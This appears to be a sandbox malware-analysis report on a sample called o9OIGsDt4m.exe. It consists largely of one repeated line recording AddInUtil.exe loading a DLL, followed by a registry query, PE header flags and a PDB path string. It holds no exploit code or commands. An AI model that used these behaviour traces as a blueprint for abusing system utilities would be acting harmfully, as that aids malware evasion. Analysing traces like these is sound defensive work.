Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Section loaded: atiadlxy.dll	Jump to behavior

Source: C:\Users\user\Desktop\o9OIGsDt4m.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: C:\Users\user\Desktop\o9OIGsDt4m.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: o9OIGsDt4m.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: o9OIGsDt4m.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: o9OIGsDt4m.exe, 00000000.00000002.2132804685.000001FA1D324000.00000004.00000800.00020000.00000000.sdmp, o9OIGsDt4m.exe, 00000000.00000002.2132804685.000001FA1D266000.00000004.00000800.00020000.00000000.sdmp, o9OIGsDt4m.exe, 00000000.00000002.2130015050.000001FA0CB80000.00000004.08000000.00040000.00000000.sdmp, Current.exe, 00000004.00000002.2181255354.00000226C1904000.00000004.00000800.00020000.00000000.sdmp
